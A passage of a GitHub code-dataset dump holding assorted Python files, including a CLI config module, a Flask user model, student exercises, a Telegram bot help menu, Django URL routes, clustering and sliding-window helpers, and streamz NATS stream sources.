List[str]):\n \"\"\"Get the specific keys from the sandbox configuration.\"\"\"\n _config = SandboxConfigManager.get_config_or_default()\n\n if not keys:\n return\n\n print_values = {}\n for key in keys:\n key = key.replace(\"-\", \"_\")\n if hasattr(_config, key):\n print_values[key] = getattr(_config, key)\n else:\n Printer.print(\"Key `{}` is not recognised.\".format(key))\n\n Printer.dict_tabulate(print_values)\n\n\ndef set(**kwargs): # pylint:disable=redefined-builtin\n \"\"\"Set the sandbox config values.\"\"\"\n try:\n _config = SandboxConfigManager.get_config_or_default()\n except Exception as e:\n handle_cli_error(e, message=\"Load configuration.\")\n Printer.heading(\"You can reset your config by running: `sandbox config-purge`\")\n sys.exit(1)\n\n for key, value in kwargs.items():\n if value is not None:\n if key == \"path\":\n set_home_path(home_path=value)\n else:\n setattr(_config, key, value)\n\n set_sandbox_config(_config, persist=True)\n Printer.success(\"Config was updated.\")\n\n\ndef purge():\n \"\"\"Purge the sandbox config values.\"\"\"\n SandboxConfigManager.purge()\n Printer.success(\"Sandbox config was removed.\")\n","repo_name":"polyaxon/haupt","sub_path":"haupt/haupt/cli/runners/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":452,"dataset":"github-code","pt":"72"} +{"seq_id":"41841588164","text":"import json\nimport uuid\nfrom datetime import datetime\n\nimport pytz\nfrom sqlalchemy.dialects.postgresql import UUID\n\nfrom src.db.db import db\n\n\nclass User(db.Model):\n id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4,\n unique=True, nullable=False)\n login = db.Column(db.VARCHAR(50), unique=True, nullable=False)\n\n password = db.Column(db.String(256), nullable=False)\n active = db.Column(db.BOOLEAN, default=True)\n\n created = db.Column(db.DateTime)\n modified = db.Column(db.DateTime, default=datetime.utcnow)\n\n is_authenticated = db.Column(db.BOOLEAN, default=False)\n is_active = db.Column(db.BOOLEAN, default=False)\n is_anonymous = db.Column(db.BOOLEAN, default=True)\n\n # relationships\n\n auth_history = db.relationship('UserAuth')\n roles = db.relationship('Role', secondary='role_user',\n back_populates='users')\n\n def __repr__(self):\n return f'User: {self.id}: {self.login}'\n\n def to_json(self) -> dict:\n return {\n 'id': self.id,\n 'email': self.email,\n 'login': self.login,\n 'roles': [role.to_json() for role in self.roles]\n if self.roles else [],\n 'auth_history': [auth.to_json() for auth in self.auth_history]\n if self.auth_history else [],\n 'created': json.dumps(self.created.astimezone(pytz.UTC),\n default=str) if self.created else None,\n 'modified': json.dumps(self.modified.astimezone(pytz.UTC),\n default=str) if self.modified else None,\n }\n\n\nclass UserAuth(db.Model):\n id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4,\n unique=True, nullable=False)\n user_id = db.Column(UUID(as_uuid=True), db.ForeignKey('user.id'),\n nullable=False)\n ip_address = db.Column(db.String(15))\n user_agent = db.Column(db.String(256))\n platform = db.Column(db.String(256), nullable=True)\n browser = db.Column(db.String(256), nullable=True)\n date = db.Column(db.DateTime, default=datetime.utcnow)\n\n def to_json(self) -> dict:\n return {\n 'id': self.id,\n 'user_id': self.user_id,\n 'ip_address': self.ip_address,\n 'user_agent': self.user_agent,\n 'platform': self.platform,\n 'browser': self.browser,\n 'date': self.date,\n }\n","repo_name":"BLARRCHER/Auth-Service","sub_path":"auth_service/src/models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74013562474","text":"#!/usr/bin/env python\n\nfrom abc import ABC, abstractmethod\n\n\n# Component interface\nclass Component(ABC):\n @abstractmethod\n def calculate_price(self):\n pass\n\n\n# Leaf class representing a Product\nclass Product(Component):\n def __init__(self, name, price):\n self.name = name\n self.price = price\n\n def calculate_price(self):\n return self.price\n\n\n# Composite class representing a Box\nclass Box(Component):\n def __init__(self, name, price):\n self.name = name\n self.items = []\n self.price = price\n\n def add(self, item):\n self.items.append(item)\n\n def calculate_price(self):\n total_price = 0\n for item in self.items:\n total_price += item.calculate_price()\n return total_price + self.price\n\n\ndef composite():\n apple = Product(\"Apple\", 1)\n banana = Product(\"Banana\", 2)\n orange = Product(\"Orange\", 3)\n\n fruit_box = Box(\"Fruit Box\", 2)\n fruit_box.add(apple)\n fruit_box.add(banana)\n fruit_box.add(orange)\n\n small_box = Box(\"Small Box\", 2)\n small_box.add(fruit_box)\n\n print(apple.calculate_price()) # Output: 1\n print(fruit_box.calculate_price()) # Output: 8 (1 + 2 + 3 + 2)\n print(small_box.calculate_price()) # Output: 10 (8 + 2)\n\n\ncomposite()\n","repo_name":"Talandar99/design_patterns","sub_path":"python/composite.py","file_name":"composite.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17865806378","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 24 12:57:52 2021\r\n\r\n@author: ahato\r\n\"\"\"\r\n\r\nimport sys\r\n\r\ndef move(symbol):\r\n x = int(reader.readline())\r\n y = int(reader.readline())\r\n if board[x][y] == \" \":\r\n board[x][y]=symbol\r\n if rowwin(symbol, x) == True or colwin(symbol, y) == True:\r\n print(\"Winning move at {} {}\".format(x,y))\r\n if m == n and diag(symbol) == True:\r\n print(\"Winning move at {} {}\".format(x,y))\r\n \r\n else:\r\n print(\"Invalid move at {} {}\".format(x,y))\r\n\r\ndef rowwin(a,row):\r\n winrow = True\r\n for j in range(0,m):\r\n if board[row][j] != a:\r\n winrow = False\r\n return(winrow)\r\n\r\ndef colwin(b,col):\r\n wincol = True\r\n for k in range(0,m):\r\n if board[k][col] != b:\r\n wincol = False\r\n return(wincol)\r\n \r\ndef diag(symb):\r\n windiag = True\r\n for i in range(m):\r\n if board[i][i] != symb:\r\n windiag = False\r\n return(windiag)\r\n\r\n\r\nif len(sys.argv) > 1:\r\n reader = open(sys.argv[1])\r\nelse:\r\n reader = sys.stdin\r\n\r\nm = int(reader.readline())\r\nn = int(reader.readline())\r\n\r\nif m > 0 and n > 0 and m <= 256 and n <= 256:\r\n board = []\r\n for i in range(m):\r\n board.append([])\r\n for j in range(n):\r\n board[i].append(\" \")\r\n\r\nfor i in range(0,m):\r\n move(\"X\")\r\n move(\"O\")\r\n \r\n\r\n \r\n","repo_name":"Ahat0z/Ahat0z","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18425772827","text":"# Weekly Task 2 (Programming & Scripting) Jack Caffrey\n# Code allows the user to input their weight (KG) & height (CM) and out puts their BMI\n\nweight = float(input(\"Please enter your Weight in Kilograms (KG): \"))\nheight = float(input(\"Please enter your Height in centimetres (CM): \"))\n\n# print (\"The weight entered is weight\" , weight , \"and height entered is\" , height,) code line used to verify inputs working correctly\n\nMeters_Squard = ((height * height) / 100) #converts CM to Meters Squared\n\nBMI = ((weight / Meters_Squard) * 100) # Calculates BMI \n\nnew_BMI = round(BMI, 2) # Rounds BMI to 2 decimal places\nprint (\"Your BMI is\" , new_BMI) #displays users BMI ","repo_name":"JackCaff/problem_solving2020","sub_path":"WT02/WT02.py","file_name":"WT02.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27808597739","text":"'''\nCreated on Sep 9, 2015\n\n@author: wirkert\n'''\n\n\nimport logging\nimport datetime\nimport os\nimport time\n\nimport numpy as np\nimport luigi\n\nimport commons\nimport mc.factories as mcfac\nfrom mc.sim import SimWrapper\nfrom mc.create_spectrum import create_spectrum\n\n# parameter setting\nNR_BATCHES = 100\nNR_ELEMENTS_IN_BATCH = 1000\n# the wavelengths to be simulated\nWAVELENGHTS = np.arange(450, 720, 2) * 10 ** -9\nNR_PHOTONS = 10 ** 6\n\n# experiment configuration\nMCI_FILENAME = \"./temp.mci\"\nMCO_FILENAME = \"temp.mco\"\n# this path definitly needs to be adapted by you\nPATH_TO_MCML = \"/home/wirkert/workspace/monteCarlo/gpumcml/fast-gpumcml/\"\nEXEC_MCML = \"gpumcml.sm_20\"\n\n\nsc = commons.ScriptCommons()\n\n\nclass CreateSpectraTask(luigi.Task):\n df_prefix = luigi.Parameter()\n batch_nr = luigi.IntParameter()\n nr_samples = luigi.IntParameter()\n factory = luigi.Parameter()\n\n def output(self):\n return luigi.LocalTarget(os.path.join(sc.get_full_dir(\"MC_DATA_FOLDER\"),\n self.df_prefix + \"_\" +\n str(self.batch_nr) + \".txt\"))\n\n def run(self):\n start = time.time()\n # setup simulation wrapper\n sim_wrapper = SimWrapper()\n sim_wrapper.set_mci_filename(MCI_FILENAME)\n sim_wrapper.set_mcml_executable(os.path.join(PATH_TO_MCML, EXEC_MCML))\n # setup model\n tissue_model = self.factory.create_tissue_model()\n tissue_model.set_mci_filename(sim_wrapper.mci_filename)\n tissue_model.set_mco_filename(MCO_FILENAME)\n tissue_model.set_nr_photons(NR_PHOTONS)\n # setup array in which data shall be stored\n batch = self.factory.create_batch_to_simulate()\n batch.create_parameters(self.nr_samples)\n # dataframe created by batch:\n df = batch.df\n # add reflectance column to dataframe\n for w in WAVELENGHTS:\n df[\"reflectances\", w] = np.NAN\n\n # for each instance of our tissue model\n for i in range(df.shape[0]):\n # set the desired element in the dataframe to be simulated\n tissue_model.set_dataframe_row(df.loc[i, :])\n logging.info(\"running simulation \" + str(i) + \" for\\n\" +\n str(tissue_model))\n reflectances = create_spectrum(tissue_model, sim_wrapper,\n WAVELENGHTS)\n # store in dataframe\n for r, w in zip(reflectances, WAVELENGHTS):\n df[\"reflectances\", w][i] = r\n\n # clean up temporarily created files\n os.remove(MCI_FILENAME)\n created_mco_file = os.path.join(PATH_TO_MCML, MCO_FILENAME)\n if os.path.isfile(created_mco_file):\n os.remove(created_mco_file)\n # save the created output\n f = open(self.output().path, 'w')\n df.to_csv(f)\n\n end = time.time()\n logging.info(\"time for creating batch of mc data: %.f s\" %\n (end - start))\n\n\nif __name__ == '__main__':\n\n # create a folder for the results if necessary\n sc.set_root(\"/media/wirkert/data/Data/2016_02_02_IPCAI/\")\n sc.create_folders()\n\n logging.basicConfig(filename=os.path.join(sc.get_full_dir(\"LOG_FOLDER\"),\n \"calculate_spectra\" +\n str(datetime.datetime.now()) +\n '.log'),\n level=logging.INFO)\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n logger = logging.getLogger()\n logger.addHandler(ch)\n luigi.interface.setup_interface_logging()\n\n sch = luigi.scheduler.CentralPlannerScheduler()\n w = luigi.worker.Worker(scheduler=sch)\n BATCH_NUMBERS = np.arange(0, NR_BATCHES, 1)\n for i in BATCH_NUMBERS:\n colon_task = CreateSpectraTask(\"ipcai_revision_generic_mean_scattering\",\n i,\n NR_ELEMENTS_IN_BATCH,\n mcfac.GenericMeanScatteringFactory())\n w.add(colon_task)\n w.run()\n\n","repo_name":"RabadanLab/MITKats","sub_path":"Modules/Biophotonics/python/iMC/scripts/ipcai2016/script_calculate_spectra.py","file_name":"script_calculate_spectra.py","file_ext":"py","file_size_in_byte":4087,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14723004059","text":"# CCC 15 J5 - Pi Day\n# Tissan Kugathas\n# February 24 2020\n\nn = int(input())\nk = int(input())\n\n\ndef pie(pieces, people, minimum):\n total = 0\n if people/pieces == minimum:\n return 1\n elif people == 1:\n return 1\n else:\n times = (pieces//people)\n for i in range(minimum, times):\n total += pie(pieces-i, people-1, i)\n return total\n\n\nif 1 <= n <= 250 and 1 <= k <= n:\n print(pie(n, k, 1))\n","repo_name":"ktissan13/Waterloo-CCC","sub_path":"2015/j5.py","file_name":"j5.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70268165993","text":"from telegram import InlineKeyboardButton, InlineKeyboardMarkup, ParseMode, Update\nfrom telegram.ext import (\n CallbackContext,\n CallbackQueryHandler,\n CommandHandler,\n Filters,\n MessageHandler,\n)\nfrom telegram.ext.dispatcher import DispatcherHandlerStop, run_async\nfrom telegram.utils.helpers import escape_markdown\nfrom Yuriko.__main__ import *\n\n\n# Buttons Function for admin module\n\n \ndef null_game_callback(update, context):\n query = update.callback_query\n if query.data == \"gamexd_\":\n query.message.edit_text(\n text=\"\"\"Here is the help for the *Game* module:\n\nWe not promise to update KIGO PERDAY\n\n✗ /game - `to play gane in chrome and other idk k`\n\n**✗ Pᴏᴡᴇʀᴇᴅ 🔥 Bʏ: Kɪɢᴏ Dᴜɴɪʏᴀ!**\n \"\"\",\n parse_mode=ParseMode.MARKDOWN,\n disable_web_page_preview=True,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(text=\"Back\", callback_data=\"help_back\")\n ]\n ]\n ),\n )\n\n \ndef kigo_game_memify_callback(update, context):\n query = update.callback_query\n if query.data == \"nullgame_\":\n query.message.edit_text(\n text=\"\"\" Here is the help for the *A-game* module:\n\n**✗ A-Game Module For play Animation game in group**\n \n✗ /dice - `dice game`\n✗ /dart - `dart gane`\n✗ /ball - `to play ball game`\n\n**✗ Pᴏᴡᴇʀᴇᴅ 🔥 Bʏ: Kɪɢᴏ Dᴜɴɪʏᴀ!**\"\"\",\n parse_mode=ParseMode.MARKDOWN,\n disable_web_page_preview=True,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(text=\"Back\", callback_data=\"help_back\")\n ]\n ]\n ),\n )\n\n\n\n# Handlers start from here \n\ngame_callback_handler = CallbackQueryHandler(null_game_callback, pattern=r\"gamexd_\", run_async=True)\ngame_memify_callback_handler = CallbackQueryHandler(kigo_game_memify_callback, pattern=r\"nullgame_\", run_async=True)\n\n\n\n\n\n\n","repo_name":"AMANTYA1/Moon","sub_path":"Yuriko/button/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40515283668","text":"import sys\r\n\r\nwysokosc = int(input(\"Podaj wysokosc diamentu: \"))\r\n\r\nlitera = str(\"o\")\r\na = int(1)\r\n\r\nif 3 <= wysokosc <= 9:\r\n if wysokosc % 2 == 0:\r\n print(\"Nie moge zbudowac diamentu ! Liczba musi byc nieparzysta\")\r\n else:\r\n\r\n srodek = int((wysokosc+1)/2)\r\n sr = srodek\r\n while 1 < sr:\r\n sr = sr-1\r\n print(\" \" * sr, end = '')\r\n print(\"o\" * ((srodek-sr)+(srodek-sr)-1))\r\n print(\"o\" * ((srodek * 2)-1))\r\n\r\n while a < srodek:\r\n print(\" \" * a, end = '')\r\n print(\"o\" * ((srodek-a)+(srodek-a)-1))\r\n a = a+1\r\n\r\n\r\nelse:\r\n print(\"Nie moge zbudowac diamentu ! Blednie wpisana wysokosc\")","repo_name":"zeruken117/UWM-WD","sub_path":"WD/zadanie11.py","file_name":"zadanie11.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44612710405","text":"def sort_by_line(matrix: list[list], k: int) -> list[list]:\n i = 0\n while i != len(matrix[k]) - 1:\n j = 0\n while j < len(matrix[k]) - 1 - i:\n if matrix[k][j] > matrix[k][j + 1]:\n for z in range(len(matrix)):\n matrix[z][j], matrix[z][j + 1] = matrix[z][j + 1], matrix[z][j]\n j += 1\n i += 1\n return matrix\n\nD = []\nm = 3\nn = 3\nk = int(input('Выберите номер k-й строки '))\n\nfor i in range(m):\n B = []\n for j in range(n):\n B.append(int(input(f'Введите [{i} , {j}] элемент матрицы ')))\n D.append(B)\n\nfor i in range(m):\n for j in range(n):\n print(D[i][j], end=' ')\n print()\n\nsort_by_line(D,k)\n\nfor i in range(m):\n for j in range(n):\n print(D[i][j], end=' ')\n print()","repo_name":"Rauntfett/Chekanov-AM","sub_path":"задание 9/9.2.py","file_name":"9.2.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8925984205","text":"import dash\nimport dash_daq as daq\nimport dash_html_components as html\n\nlayout = html.Div(\n [\n html.Div(\n [\n html.H1(\"Thank you for your participation!\"),\n html.P(\n \"You can take this questionaire as often as you want!\",\n className=\"lead\",\n ),\n ],\n className=\"jumbotron\",\n ),\n html.Div(\n [\n html.Hr(),\n html.Footer(\n \"© Laboratory of Molecular Simulation (LSMO), École polytechnique fédérale de Lausanne (EPFL)\"\n ),\n ],\n className=\"container\",\n ),\n ],\n className=\"container\",\n # tag for iframe resizer\n **{\"data-iframe-height\": \"\"},\n)\n","repo_name":"kjappelbaum/colorjeopardy","sub_path":"colorjeopardy/app_complete.py","file_name":"app_complete.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34244966298","text":"\"\"\"\nCreate custom streamz sources.\n\nClasses:\n\n from_nats\n\"\"\"\nimport asyncio\nimport inspect\nfrom typing import Callable, Union\n\nimport nats\nfrom nats.aio.msg import Msg\nfrom streamz import Source, Stream\n\n\n@Stream.register_api(staticmethod)\nclass from_nats(Source): # pylint: disable=C0103\n \"\"\" Accepts messages from nats\n\n Examples\n --------\n >>> import nats\n >>> from streamz import Stream\n >>> s = Stream.from_nats(\n ... 'nats://localhost:4222',\n ... ['my-topic'],\n ... )\n >>> decoder = s.map(lambda x: x.decode())\n >>> L = decoder.sink_to_list()\n \"\"\"\n def __init__(\n self,\n servers: Union[str, list[str]],\n topics: Union[str, list[str]],\n callback: Union[Callable, None] = None,\n poll_interval: float = 0.1,\n **kwargs):\n self.servers = servers\n if isinstance(topics, list):\n self.topics: str = '|'.join(topics)\n else:\n self.topics = topics\n if callback is None:\n callback = self._process_message\n self._cb = self._process_message\n self.poll_interval = poll_interval\n\n sig_stream = set(inspect.signature(Stream).parameters)\n sig_source = set(inspect.signature(Source).parameters)\n streamz_kwargs = {k: v for (k, v) in kwargs.items()\n if (k in sig_stream) or (k in sig_source)}\n self.kwargs = {k: v for (k, v) in kwargs.items()\n if (k not in sig_stream) and (k not in sig_source)}\n super().__init__(**streamz_kwargs)\n\n async def _process_message(self, message):\n self.emit(message.data.decode(), asynchronous=True)\n\n async def _run(self):\n # # Opt 1. With coroutine\n # # Will not return any message until max_msgs is reached\n # while True:\n # try:\n # self.consumer = await self.client.subscribe(\n # self.topics, max_msgs=5)\n # tasks = [self._cb(msg)\n # async for msg in self.consumer.messages]\n # # These three options seems to be equivalent\n # # await asyncio.gather(*tasks, return_exceptions=True)\n # # Should raise timeout error when all the tasks are not done\n # await asyncio.wait_for(\n # asyncio.gather(\n # *tasks, return_exceptions=True),\n # timeout=self.poll_interval)\n # # Should not raise timeout error and split the tasks\n # await asyncio.wait(tasks, timeout=self.poll_interval)\n # logging.info(\"done\")\n # except asyncio.TimeoutError:\n # logging.info(\"timeout\")\n # break\n # # Opt 2.a Without coroutine in while loop\n # # Will return messages if they arrive in time\n # self.sub = await self.client.subscribe(\n # self.topics,\n # cb=self._cb)\n # await asyncio.sleep(self.poll_interval)\n # # Will deliver remaining messages\n # await self.sub.drain()\n # # # Will not deliver remaining messages\n # # await self.sub.unsubscribe()\n # # logging.info(\"done\")\n # Opt 3. Synchronous\n async for msg in self.sub.messages:\n await self._cb(msg)\n await asyncio.sleep(self.poll_interval)\n\n async def run(self):\n self.client = await nats.connect(self.servers, **self.kwargs)\n # # Opt 2.b Without coroutine out of loop - will return all messages\n # self.sub = await self.client.subscribe(\n # self.topics,\n # cb=self._cb)\n # while not self.stopped:\n # await asyncio.sleep(self.poll_interval)\n # # Opt 2.a Without coroutine in while loop\n # while not self.stopped:\n # await self._run()\n # Opt 3. Synchronous\n self.sub = await self.client.subscribe(self.topics)\n while not self.stopped:\n await self._run()\n\n # TODO: drain client on stop\n # async def _stop(self):\n # await self.sub.unsubscribe()\n # await self.client.drain()\n\n # def stop(self):\n # \"\"\"set self.stopped, which will cause polling to stop after next run\n # \"\"\"\n # if not self.stopped:\n # asyncio.run(self._stop())\n # self.stopped = True\n\n\n@Stream.register_api(staticmethod)\nclass from_jetstream(Source): # pylint: disable=C0103\n \"\"\" Accepts messages from jetstream\n\n Examples\n --------\n >>> import nats\n >>> from streamz import Stream\n >>> s = Stream.from_jetstream(\n ... 'nats://localhost:4222',\n ... ['my-topic'],\n ... 'test_subscription'\n ... )\n >>> decoder = s.map(lambda x: x.decode())\n >>> L = decoder.sink_to_list()\n \"\"\"\n def __init__(\n self,\n servers: Union[str, list[str]],\n topics: Union[str, list[str]],\n subscription_name: str,\n callback: Union[Callable, None] = None,\n poll_interval: float = 0.1,\n **kwargs):\n self.servers = servers\n if isinstance(topics, list):\n self.topics: str = '|'.join(topics)\n else:\n self.topics = topics\n self.subscription_name = subscription_name\n if callback is None:\n callback = self._process_msg\n self._cb = self._process_msg\n self.poll_interval = poll_interval\n\n sig_stream = set(inspect.signature(Stream).parameters)\n sig_source = set(inspect.signature(Source).parameters)\n streamz_kwargs = {k: v for (k, v) in kwargs.items()\n if (k in sig_stream) or (k in sig_source)}\n self.kwargs = {k: v for (k, v) in kwargs.items()\n if (k not in sig_stream) and (k not in sig_source)}\n super().__init__(**streamz_kwargs)\n\n async def _process_msg(self, msg: Msg):\n try:\n self.emit(msg, asynchronous=True)\n await msg.ack()\n except Exception: # pragma: no cover\n await msg.nak()\n\n async def _run(self):\n try:\n msgs = await self.sub.fetch(1)\n for msg in msgs:\n await self._cb(msg)\n except TimeoutError: # pragma: no cover\n pass\n finally:\n await asyncio.sleep(self.poll_interval)\n\n async def run(self):\n self.nc = await nats.connect(self.servers, **self.kwargs)\n self.client = self.nc.jetstream()\n self.sub = await self.client.pull_subscribe(\n self.topics, durable=self.subscription_name)\n while not self.stopped:\n await self._run()\n","repo_name":"MarekWadinger/streamz_nats","sub_path":"streamz_nats/sources.py","file_name":"sources.py","file_ext":"py","file_size_in_byte":6757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41795320076","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\ndef get_label_length_and_num(L, N):\n length, summary = 0, 0\n\n for i in range(1, 51):\n prev_sum = summary\n summary += len(L) ** i\n length = i\n if (summary >= N):\n break\n\n return length, (N - prev_sum)\n\ndef solve():\n L, N = input().split(' ')\n N = int(N)\n label_length, n = get_label_length_and_num(L, N)\n last_n = n\n ans = list(L[0] * label_length)\n mod = n % len(L)\n\n ans[0] = L[mod-1] if mod else L[-1]\n\n if label_length < 2:\n return ''.join(reversed(ans))\n\n for i in range(label_length-1, 0, -1):\n for j in range(1, len(L)+1):\n if (len(L) ** i) * j < last_n:\n continue\n ans[i] = L[j-1]\n break\n last_n -= (len(L) ** i) * (j - 1)\n\n return ''.join(reversed(ans))\n\ndef main():\n T = int(input())\n for i in range(T):\n print('Case #{i}: {answer}'.format(i=i+1, answer=solve()))\n\nif __name__ == '__main__':\n main()\n","repo_name":"changyuheng/hacker-cup-solutions","sub_path":"2014/round-1/labelmaker.py","file_name":"labelmaker.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22804546758","text":"import numpy as np\r\n\r\ndef window(image,window_size=(64,64),x_step=0.5,y_step=0.05,x_range=(0,1),y_range=(0,1),scale=1.5):\r\n windows=[]\r\n h,w=np.array(image).shape[:2]\r\n \r\n for y in range(int(y_range[0]*h), int(y_range[1]*h),int(y_step*h)):\r\n win_width =int(window_size[1] + scale * (y-(y_range[0]*h)))\r\n win_height = int(window_size[0] + scale * (y-(y_range[0]*h)))\r\n \r\n if y+win_height >int (y_range[1]*h) or win_width > w:\r\n break\r\n \r\n x_steps = int(x_step*win_width)\r\n for x in range(int(x_range[0]*w), int(x_range[1]*w) - win_width + x_steps , x_steps):\r\n windows.append((x , y , x + win_width , y + win_height))\r\n \r\n \r\n return np.array(windows)\r\n","repo_name":"around-star/Car-Detection","sub_path":"sliding_windows.py","file_name":"sliding_windows.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32802563909","text":"\"\"\"DaftarProject URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom Daftar import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('register/', views.user_register, name=\"register\"),\n path('login/', views.user_login, name=\"login\"),\n path('logout/', views.userlogout, name='logout'),\n path('create_profile/', views.create_profile, name='create_profile'),\n path('profile_page/', views.profile_page, name='profile_page'),\n path('create_post//', views.create_post, name='create_post'),\n path('search_user/', views.search_user, name='search_user'),\n path('follow//', views.follow_user, name=\"follow-button\"),\n path('followers_page//', views.followers_page, name='followers_page'),\n path('following_page//', views.following_page, name='following_page'),\n path('user_profile//', views.user_profile, name='user_profile'),\n path('feed_page//', views.feed_page, name='feed_page'),\n]\n\nif settings.DEBUG:\n urlpatterns+=static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns+=static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"DesertDemons/Daftar","sub_path":"DaftarProject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7170788797","text":"import scipy\nimport scipy.cluster.hierarchy as sch\nimport numpy as np\nimport matplotlib.pylab as plt\n\n#X = scipy.randn(1001,2)\nharris = np.load('harrisresponse1.npy')\nvar = np.load('vargrads1.npy')\n\n\nX = []\n\nfor i in range(len(harris)):\n X.append([harris[i], var[i]])\nd = sch.distance.pdist(X)\n\nZ= sch.linkage(d,method='complete')\n\nP =sch.dendrogram(Z)\n\nT = sch.fcluster(Z, 0.5*d.max(), 'distance')\n#array([4, 5, 3, 2, 2, 3, 5, 2, 2, 5, 2, 2, 2, 3, 2, 3, 2, 5, 4, 5, 2, 5, 2,\n# 3, 3, 3, 1, 3, 4, 2, 2, 4, 2, 4, 3, 3, 2, 5, 5, 5, 3, 2, 2, 2, 5, 4,\n# 2, 4, 2, 2, 5, 5, 1, 2, 3, 2, 2, 5, 4, 2, 5, 4, 3, 5, 4, 4, 2, 2, 2,\n# 4, 2, 5, 2, 2, 3, 3, 2, 4, 5, 3, 4, 4, 2, 1, 5, 4, 2, 2, 5, 5, 2, 2,\n# 5, 5, 5, 4, 3, 3, 2, 4], dtype=int32)\n\nsch.leaders(Z,T)\n# (array([190, 191, 182, 193, 194], dtype=int32),\n# array([2, 3, 1, 4,5],dtype=int32))\n\ndef plot_tree(P, pos=None):\n plt.clf()\n icoord = scipy.array(P['icoord'])\n dcoord = scipy.array(P['dcoord'])\n color_list = scipy.array(P['color_list'])\n print(len(color_list))\n xmin, xmax = icoord.min(), icoord.max()\n ymin, ymax = dcoord.min(), dcoord.max()\n if pos:\n icoord = icoord[pos]\n dcoord = dcoord[pos]\n color_list = color_list[pos]\n fig, ax = plt.subplots()\n\n for xs, ys, color in zip(icoord, dcoord, color_list):\n ax.plot(xs, ys, color)\n\n\n ax.set_xlabel('Weighted Average of Harris Response Function')\n ax.set_ylabel('Height')\n ax.set_title('Agglomerative Hierarchical Cluster Dendogram')\n plt.show()\n\n\n \nplot_tree(P)","repo_name":"siddharthbharthulwar/Synthetic-Vision-System","sub_path":"Pipeline/hierarchy.py","file_name":"hierarchy.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"39950988824","text":"from django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('api/follow/', views.FollowAndUnfollow),\n path('api/follow-read/', views.FollowPhotoRead),\n path('api/follow-latest-photo', views.FollowingLatestPhoto),\n path('api/sign-up/', views.SignUp),\n path('api/sign-in/', views.SignIn),\n path('api/recipe-favorite/', views.RecipeFavorites)\n]","repo_name":"pgw928/DjangoRestFramework","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2078696625","text":"import random\n\nimport torch\nfrom torch import nn\n\nimport numpy as np\n\nfrom utils import default_device\nfrom .utils import get_batch_to_dataloader\nfrom .utils import order_by_y, normalize_data, normalize_by_used_features_f, Binarize\nfrom .utils import trunc_norm_sampler_f, beta_sampler_f, gamma_sampler_f, uniform_sampler_f, zipf_sampler_f, scaled_beta_sampler_f, uniform_int_sampler_f\n\n\ndef canonical_pre_processing(x, canonical_args):\n assert x.shape[2] == len(canonical_args)\n ranges = [torch.arange(num_classes).float() if num_classes is not None else None for num_classes in canonical_args]\n for feature_dim, rang in enumerate(ranges):\n if rang is not None:\n x[:, :, feature_dim] = (x[:, :, feature_dim] - rang.mean()) / rang.std()\n return 